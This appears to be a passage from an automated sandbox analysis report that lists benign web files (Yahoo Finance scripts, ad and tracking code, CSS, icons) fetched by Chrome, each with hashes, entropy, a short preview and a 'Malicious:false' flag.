                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):4365
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.145735525465993
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:96:3hNzEpwq1krLq1Jr/9Ipefr4qN1lnA7O39IptQbmGMakwQy+p:3zEwuuLul/2pefN1lAC32Aa/akty+p
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:9D2A8EFBE3FE9705E54DF41100EA2DAE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:9CA39F309735BE4BDA4D6CE2D01C5F0857BD8E67
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:F59452BBA989E5A78E9492AE296CBF910745529C3294B49A58EFA4EC7EBA8D45
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:5D460C83F9DD30038422F843C68D1BE812E3006395355122BBA8E8608822B9751D2800FE024C85276FA36130D787364CF6CFAF333F9C0D3CC6FC2E3DEC796775
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-clipboard-copy",[],t):"object"==typeof exports?exports["wafer-clipboard-copy"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-clipboard-copy"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(r){if(o[r])return o[r].exports;var n=o[r]={i:r,l:!1,exports:{}};return e[r].call(n.exports,n,n.exports,t),n.l=!0,n.exports}var o={};return t.m=e,t.c=o,t.d=function(e,o,r){t.o(e,o)||Object.defineProperty(e,o,{configurable:!1,enumerable:!0,get:r})},t.n=function(e){var o=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(o,"a",o),o},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,o){"use strict";function r(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a cl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.292508224289396
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:CUmExltxlSle:JAle
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:55FADE2068E7503EAE8D7DDF5EB6BD09
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:317496A096D6C86486A71D4521994BCD171A6BB3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:E586A84D8523747F42E510D78E141015B6424CF67D612854E892A7BCEDC8EC9E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:A9ADB9FEEA4BC14B9C34ED17CD30F8CB36DC686E9F69A292FE65BEBC195BE4714391FD98EC7B67BFD363FBBB6089C41A0B7CAB5130B50B461748E668CAC75621
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.tribalfusion.com/z/i.match?p=b11&redirect=https%3A//simage2.pubmatic.com/AdServer/Pug%3Fvcode%3Dbz0yJnR5cGU9MSZjb2RlPTMzMjYmdGw9MTI5NjAw%26piggybackCookie%3D%24TF_USER_ID_ENC%24&u=${PUBMATIC_UID}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,........@..D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (24198)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):27250
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.422166358554103
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:j39Vu+xvhAOGtK0oOa7CD+SaRitSCoz+K0Yed+4JrkKstSpgVJmR/6yIhXcR0hz5:BVugW39WhWiyIheH0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:65BEC8558BCBE67D88D6D1233FFC1B14
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:C1A09B392C56D4DD6A3D057AB9CCC71C2EA8FAFF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:68890E38FCF44FC05032D16F27F314F7C2B49C7E1EDF25D21C8AF58DE39B4BBA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:18FEB7C771475FA110FADB7576235CE4B3FFFE358257FA0EDB4A34536664588E7ACB5A0D0784112BB55687451F2A5DF23E307E2F4DDF017116BFECD473AB5CCC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:/*! SAFEFRAME 0.1.487 . 2024, Yahoo Inc. All rights reserved. */(()=>{var e={466:e=>{var t;(t=void 0===t?{}:t).close={name:"close",height:48,width:48,path:"M37.98 34.827l-9.9-9.9 9.9-9.898c.78-.782.78-2.05 0-2.83-.78-.78-2.047-.78-2.828 0l-9.9 9.9-9.898-9.9c-.78-.78-2.048-.78-2.828 0-.78.78-.78 2.047 0 2.828l9.9 9.9-9.9 9.898c-.78.78-.78 2.047 0 2.828.78.78 2.047.78 2.828 0l9.9-9.9 9.898 9.9c.78.78 2.048.78 2.828 0 .782-.78.782-2.047 0-2.827z"},e.exports&&(e.exports=t.close)},228:e=>{var t;(t=void 0===t?{}:t)["decline-fill"]={name:"decline-fill",height:48,width:48,path:"M24 1C11.3 1 1 11.3 1 24s10.3 23 23 23 23-10.3 23-23S36.7 1 24 1zm9.8 32.8c-.9.9-2.2.9-3.1 0L24 27l-6.8 6.8c-.9.9-2.2.9-3.1 0s-.9-2.2 0-3.1l6.8-6.8-6.7-6.7c-.9-.9-.9-2.2 0-3.1.9-.9 2.2-.9 3.1 0l6.7 6.7 6.7-6.7c.9-.9 2.2-.9 3.1 0 .9.9.9 2.2 0 3.1l-6.7 6.7 6.7 6.8c.9.9.9 2.3 0 3.1z"},e.exports&&(e.exports=t["decline-fill"])},586:(e,t,n)=>{"use strict";var o=n(427),r=n(215),i=n(945);function s(){}function a(e){return e&&"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (3567), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):3567
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.32203621037149
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:+7yzk8YvPEi6qA0zonBU07qdgp1qds7dbaXxitE+7K1Uh++xnvQ956eY+pstV0hh:+7ZPvMzBfqSqAYUU+xnI9ovINZ
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:C52AA1EA682AEF8AD5EBF7AFF9662E35
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:E171DA979A8C5DFB1DEF6A4ED2F4C72BB787CD18
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:BCE4B47B8FC12DE49FAC0A00E9039E38AA568ABA0EE9154B93D20465F0289CFA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:BD010B3C92B9737B31F70E3EF108B11093075EFA80CC096B6BB3E9591DAD6E5420B50D6E949F9D2DAFBB420514906667282ED155F8E355A5738D965ED3226D34
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:!function(t){try{var e="https://",n="aHR0cHM6Ly9waXBzLnRhYm9vbGEuY29t",r=["YXJjaGl0ZWN0dXJl","cGxhdGZvcm1WZXJzaW9u","dWFGdWxsVmVyc2lvbg=="],a=["YnJhbmRz","bW9iaWxl","bW9kZWw=","cGxhdGZvcm0=","cGxhdGZvcm1WZXJzaW9u","dWFGdWxsVmVyc2lvbg=="];t.TRC.cdsPips={userId:null,getHttpsPrefix:function t(){return e},doNothing:function t(){return!0},safeGetTfaConfig:function e(n,r,a){return t._tfa&&t._tfa.config&&t._tfa.config.safeGet&&t._tfa.config.safeGet(n,r,a)},safeGetRboxConfig:function t(e){var n;return(TRCImpl?TRCImpl.global:{})[e]},prepareGenericRequest:function e(n,r){var a,s=new(t.XDomainRequest||t.XMLHttpRequest);return s.open(n,r),s.onload=this.doNothing,s.onerror=this.doNothing,s.onprogress=this.doNothing,s},tryToReadUserIdFromLocalStorage:function t(){try{return window.localStorage["taboola global:user-id"]}catch(t){return null}},getUserId:function e(){var n=t.TFASC&&t.TFASC.tfaUserId&&"function"==typeof t.TFASC.tfaUserId.getUserId?t.TFASC.tfaUserId.getUserId():null,r=t.TRC.pageManager&&
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (2859)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2860
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.4371594490509425
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:KrOb0yw+Y0xy8qznaHyWAbG3/MQjUo+ejRdz/3M1tkPAAk/cCQDhbi3ssTA6vn:W9IxWznkKCP3X+ejR9/czkYAkECQDZw7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:B78A0ED869BB15672BC487A826FC9AF4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:172BAB8588599D59F2DF84E96682C7842D110C55
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:0E9F159AB39B71B0894AD68B4FF9D89AD7C234511587B4614BF872C2D32E9F4D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:1E2EF8D5DCE4E574AEA45DB5CEF29E8A1D641CD68C464BC73A868401C0BEFA9A44AD317048EBC9A5D24A7C39B6D7553283B75716F28867CB2531A5F357E9D20F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/SectionWithSidebar.Cjxf8hNi.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as j,c as P,e as E,b as I,d as O,f as w,j as k,i as g,q as p,L as R,k as G,l as b,F as B,G as F,u as z,g as A,a as D,v as M,y as T}from"./scheduler.Dsuh-FKt.js";import{S as W,i as H,t as v,g as J,a as S,e as K,c as Q,b as U,m as X,d as Y}from"./index.CvwOawEI.js";import{A as Z}from"./AdGroup.B9K-yuAc.js";import{r as $}from"./resizeUtil.BFOdtaWL.js";import{r as x}from"./ads.DhuB_mth.js";import{P as ee}from"./commonUtil.BWwawKjd.js";const se=t=>({}),V=t=>({}),te=t=>({}),L=t=>({refreshAds:t[5]}),ie=t=>({}),N=t=>({});function q(t){let e,r,f,l,h;const d=t[7].sidebar,n=P(d,t,t[6],V);return l=new Z({props:{ids:t[4],className:"tw-m-0 tw-pb-2"}}),{c(){e=E("div"),r=E("div"),n&&n.c(),f=I(),Q(l.$$.fragment),this.h()},l(i){e=O(i,"DIV",{class:!0});var u=w(e);r=O(u,"DIV",{class:!0});var a=w(r);n&&n.l(a),f=k(a),U(l.$$.fragment,a),a.forEach(g),u.forEach(g),this.h()},h(){p(r,"class","tw-sticky tw-top-32"),p(e,"class","sidebar yf-hvsrhi")},m(i,u){G(i,e,u),b(e,r),n&&n.m(r,null),b(r,f),X(l,r,null)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):158
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.994787172741404
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:yLRmcpZ6CdPtpOq94IhXVHws6Tac3mDDpKfFsLGD/DNKv:yL/pZ6CVCq9JVHwJW1iFqt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:CA243B22264DCA7A4A899C51CC2DC963
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:CF47310BBB10F981E5735CBCB6196F688782A625
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:95FB5A5390AFDA7B7734B303C9F724039FDA305313CE9517AA5F7A544A208AF0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:704E626A74A47B560B3316788B46F7CAF94E1E831B9290551C52DBF4D1E8DD8B72BACBBF6164EAA393BD97DABA0C351881B2F9D83A92F3BAAC49322BF9B5040B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:document.write('<div id="advertisement-thamba" style="display:none">Display Advertisement</div>');/* Copyright (c) 2020, Yahoo! Inc. All rights reserved. */.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):19
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.4713544870139303
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:dRYtyn:Tuyn
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:34C520D87664032692C4315FFF455D18
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:978C8B03E97680EB62057A7000F6E7FD97FB9658
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:C40AA69F0B306CEA296DD1193C334BC0781587ED51AAB579C0433698BA9E0C4B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:BC6ECF7B39E2C5882C693072A7F541A7C03117A28D14067FED6FDAB6BD455FD8E79C6FE9B81FDF327E64814B91ACEE6F9C1A62134C32CF39731477B712466F38
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:Method Not Allowed.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1308)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1309
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.04998942349745
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:q1GtZcefjJR94XPMbq51Q1FPrl/fTqRZ7sCtwohVpWjRXHKycvn:yG5rJ4hDklLgsArXW9XHXcvn
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:4354A9DD51B6388DB42CC727D8C12B14
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:2AE13E9A82AA3F90C6A30282D2B7106FD56F640C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:7F8A1F695701338EC89F58773C2E0D986A47D6AEA3DE0CCE8D72BCACFCF192C2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:0BF433F14FECCA7C1200463696F9158DFCC89C60887FD60291C1268699EE584838777C59AD16E9B97ADC1557FDD8FB27C5B001BACEE569AD56CDFD07A63F9BB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:const c='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M19.43 12.98c.04-.32.07-.64.07-.98s-.03-.66-.07-.98l2.11-1.65c.19-.15.24-.42.12-.64l-2-3.46a.5.5 0 0 0-.61-.22l-2.49 1c-.52-.4-1.08-.73-1.69-.98l-.38-2.65A.49.49 0 0 0 14 2h-4c-.25 0-.46.18-.49.42l-.38 2.65c-.61.25-1.17.59-1.69.98l-2.49-1a.6.6 0 0 0-.18-.03c-.17 0-.34.09-.43.25l-2 3.46c-.13.22-.07.49.12.64l2.11 1.65c-.04.32-.07.65-.07.98s.03.66.07.98l-2.11 1.65c-.19.15-.24.42-.12.64l2 3.46a.5.5 0 0 0 .61.22l2.49-1c.52.4 1.08.73 1.69.98l.38 2.65c.03.24.24.42.49.42h4c.25 0 .46-.18.49-.42l.38-2.65c.61-.25 1.17-.59 1.69-.98l2.49 1q.09.03.18.03c.17 0 .34-.09.43-.25l2-3.46c.12-.22.07-.49-.12-.64zm-1.98-1.71c.04.31.05.52.05.73s-.02.43-.05.73l-.14 1.13.89.7 1.08.84-.7 1.21-1.27-.51-1.04-.42-.9.68c-.43.32-.84.56-1.25.73l-1.06.43-.16 1.13-.2 1.35h-1.4l-.19-1.35-.16-1.13-1.06-.43c-.43-.18-.83-.41-1.23-.71l-.91-.7-1.06.43-1.27.51-.7-1.21 1.08-.84.89-.7-.14-1.13c-.03-.31-.05-.54-.05-.74s.02-.43.05-.73l.14-1.13-.89-.7-1.08
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (7742)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):7743
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.433319001450765
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:eimTMHBf+FbAi4espunrn0rDrCInM/5Gw2htEsCr1rR0B3z34:eiEMF6bA2spErn0rDPO5Gw2h+sCr1rRt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:F98B59C6AFF5AB4F9B238F3A1C1E4BB3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:CA9ED9E63390B1F833CCA3DE7853508C938764D6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:5D752AE714B9F5E5F3670CCA70928107D7F4DFA85D39DD022FA935CE104634B2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:A19DB660A837EB1255CC42DFFD4A3A6BF05E9B5947362E96A87E302AE0648F8206A74D1AB9FFFBCFDE6431D4D5796988E0B03B2CC9F4C8451228E8B987D99380
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/StarRating.c2tDcFcM.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as L,e as G,d as P,f as U,i as $,q as H,k as C,n as _,Z as J,Q as K,L as Y,b as ee,p as B,j as te,x as O,t as le,h as ne}from"./scheduler.Dsuh-FKt.js";import{S as z,i as q,t as y,a as S,c as A,b as N,m as T,d as R}from"./index.CvwOawEI.js";import{aa as re,m as ae,a6 as ie,t as se}from"./commonUtil.BWwawKjd.js";import{u as oe,f as ce,s as ue}from"./ReorderHandle.ID8a-xJC.js";import{S as X}from"./Sparkline.Dm-g_Bwm.js";import{L as fe}from"./Link.vSNQugO0.js";import{e as j}from"./each.CI2tb2RB.js";import{I as Z}from"./Icon.C8w5V9EK.js";import{a as me,S as ge}from"./star.BeZIjP36.js";var W=oe,Q=ce,he=ue,_e=function(r,t){const{min:l,max:e,value:i,start:o=i,w:c=140,h:s=25,axisColor:n="#e0e4e9",labelTextColor:a="#5b636a",candleColor:u="#0f69ff",locale:V="en",fractionDigits:k=2,barHeight:d=2,font:w="10px Helvetica Neue, Helvetica, Arial, sans-serif"}=t;if(!W.isNumber(l)||!W.isNumber(e)||!W.isNumber(i))return;const p=1.2*W.extractFontSize(w),x=(s-p-d-2)/3,h=[x,c-x],g=h[1]-h[0],f=r.getC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (1569)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1570
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.263643110751404
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:3XLCd7Eb0s2AsG9Z4ebZTPG9b9+ZFSnoEncaA:3X675s2AsGHt4gSnoEcaA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:D38FB9D4E5D37A47AEFE9CBF4DA98B2B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:077568569A35E788F4C6DADD84BD231DF5771D6D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:7462151FE63ECF05F4CDB06A3C8B0CD2749F2EDEECDABD8845487B3E1649C631
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:5341225F6F46784066AD691AAF388111B7AF6D2B7D3C27F1936FCEBF018305A544525B7FD2BD67285AE829E1A24FE39BA508C4A9BDC834CA3B0EBE71AB2E3BEB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as w,e as y,d as C,f as D,i as H,k as I,n as d,P as T,I as W,Q as b}from"./scheduler.Dsuh-FKt.js";import{S as q,i as v}from"./index.CvwOawEI.js";function z(s){let t;return{c(){t=y("li")},l(i){t=C(i,"LI",{}),D(t).forEach(H)},m(i,l){I(i,t,l),s[6](t)},p:d,i:d,o:d,d(i){i&&H(t),s[6](null)}}}function x(s,t,i){let{threshold:l=0}=t,{elementScroll:r=void 0}=t,{hasMore:a=!0}=t,{useWindow:c=!1}=t,{isLoading:h}=t;const u=T();let o;function f(e){var g,m,S;if(h)return;const n=c?e.target.documentElement||((g=e.target.document)==null?void 0:g.documentElement):e.target;if(n){const L=(m=n.querySelector(".layoutContainer .mainContainer"))==null?void 0:m.offsetHeight,E=(S=n.querySelector(".layoutContainer > .right .dock"))==null?void 0:S.offsetHeight,_=n.scrollHeight-n.clientHeight-n.scrollTop;if(E>L){const k=E-L;n.scrollHeight-k-n.clientHeight-n.scrollTop<=l&&a&&u("loadMore")}else _<=l&&a&&u("loadMore")}}W(()=>{let e;return(o||r||c)&&(e=c?window:r||(o==null?void 0:o.parentNode),e==null||e.addEve
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (851)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):852
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.010469710944666
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12:slHVNmseK2ORe+XPAFYiCIKV2kxAFY6IKTRC2pAfRyjkHE2drb:yVUwLe+33VTxe38QY9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:EABBCE78DC4FD8416C5C1ECEDAE40B82
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:0915344D1447FF9AD482B751C1B08DB8A315398A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:3E888EF396625064DB9F06ACD8AE5A58ED5890AD095785EE9B20B7AFFB13C531
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:28573434D439194910D7C57B537A0BCDBB1AAC7FCC33783F53A5BEFAB4DD2CEF4D07B8600FAF8383D76E5F74A59E3D46D4849A8C1DE6C61B62D83E808F8B64C5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/assets/GradientScale.BwfNrsj8.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.gradientScale.yf-1sfyzm6.yf-1sfyzm6{display:flex;align-items:center;gap:var(--space-0);width:100%}.gradientScale.alignRight.yf-1sfyzm6.yf-1sfyzm6{justify-content:flex-end}.gradientScale.yf-1sfyzm6 .item.yf-1sfyzm6{max-width:3.5rem;width:14.2857142857%}.gradientScale.yf-1sfyzm6 .item:first-of-type .colorSwatch.yf-1sfyzm6{border-bottom-left-radius:4px;border-top-left-radius:4px}.gradientScale.yf-1sfyzm6 .item:last-of-type .colorSwatch.yf-1sfyzm6{border-bottom-right-radius:4px;border-top-right-radius:4px}.gradientScale.yf-1sfyzm6 .item:not(:last-of-type) .colorSwatch.yf-1sfyzm6{border-right:1px solid var(--surface1)}.gradientScale.yf-1sfyzm6 .item .colorSwatch.yf-1sfyzm6{width:100%;height:12px}.gradientScale.yf-1sfyzm6 .item p.yf-1sfyzm6{font-size:var(--font-s);font-weight:var(--font-normal);min-width:100%;line-height:125%;text-align:center}.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):32
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.413909765557392
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:H8o9WthbRmEtYYn:H9qa2YY
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:A24DC2342FD7CD7F9B3C5ABC5AC8BB70
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:680A4554B6EF5A52E026AD8EBE49714DD4F56853
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:2329D5FFB8ADDE4F1EA6AB2D24A69F77C7E94DD3A46B5CE48BD4B8FCC9C121D0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:65C6E47ABD3FDCC7D8B2579D71B7B4F19FE50B1CD259B660FEAB09E8805B4E73C173DF733EEE9B65CB9832D22FF804FC38819D10B6A5507C3FC5B213720152F1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAmSBE2hPnA5zRIFDWl5tVoSEAkBd6m9shO6bhIFDWl5tVo=?alt=proto
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:CgkKBw1pebVaGgAKCQoHDWl5tVoaAA==
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (31010)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):31104
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.274620417309983
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:OPfYJnHiAOVGzl8fCN3nULLuZgsucvRyinDOtHYhrh4BEt1:nJ8fU8L9sucvRyinCt4+BEt1
